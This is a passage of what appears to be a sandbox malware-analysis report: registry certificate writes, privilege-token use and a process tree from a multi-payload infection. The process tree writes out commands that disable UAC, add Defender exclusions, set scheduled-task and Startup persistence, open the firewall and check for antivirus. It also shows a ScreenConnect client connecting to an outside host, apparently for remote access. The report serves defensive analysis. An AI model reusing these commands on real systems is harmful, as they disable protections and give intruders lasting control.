| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
Runs ping.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\server.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Bitdefender\$77-Bitdefender.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\rea.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\22.exe | N/A |
| N/A | N/A | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\333.exe | N/A |
| N/A | N/A | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| N/A | N/A | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
C:\Users\Admin\AppData\Local\Temp\a\Update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "opssvc wrsa"
C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 634977
C:\Windows\SysWOW64\extrac32.exe
extrac32 /Y /E Gtk
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\findstr.exe
findstr /V "Constitution" Wagon
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com
Surrey.com Q
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"
C:\Users\Admin\AppData\Local\Temp\a\windows.exe
"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7DFC0315C2B2425ED030A7470E203C96 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID27B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259445449 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Users\Admin\AppData\Local\Temp\a\T.exe
"C:\Users\Admin\AppData\Local\Temp\a\T.exe"
C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe
"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\Users\Admin\AppData\Local\Temp\a\access.exe
"C:\Users\Admin\AppData\Local\Temp\a\access.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
C:\Users\Admin\AppData\Local\Temp\a\36.exe
"C:\Users\Admin\AppData\Local\Temp\a\36.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 156
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE189.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\AppData\Local\Temp\a\99999.exe
"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"
C:\Users\Admin\AppData\Local\Temp\a\22.exe
"C:\Users\Admin\AppData\Local\Temp\a\22.exe"
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"
C:\Users\Admin\AppData\Local\Temp\a\Network.exe
"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 684
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005B4" "00000000000003E0"
C:\Users\Admin\AppData\Local\Temp\a\rea.exe
"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force
C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe
"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AclqLgFB8I0B.bat" "
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE62.tmp"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8BD0D7494D24BA86F55F18A3C1C05FB6
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp10A5.tmp"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 41A763ADD0F1DF3212DC42565CDD272C M Global\MSI0000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "33ae33d0-0a18-44cf-9eee-21fa31a09983" "User"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "6908b49c-ba33-40d9-a062-3d98cb504da9" "System"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"
C:\Users\Admin\AppData\Local\Temp\a\mod.exe
"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\Server.exe
"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
C:\Users\Admin\AppData\Local\Temp\a\Client.exe
"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"
C:\Users\Admin\AppData\Local\Temp\a\jij.exe
"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
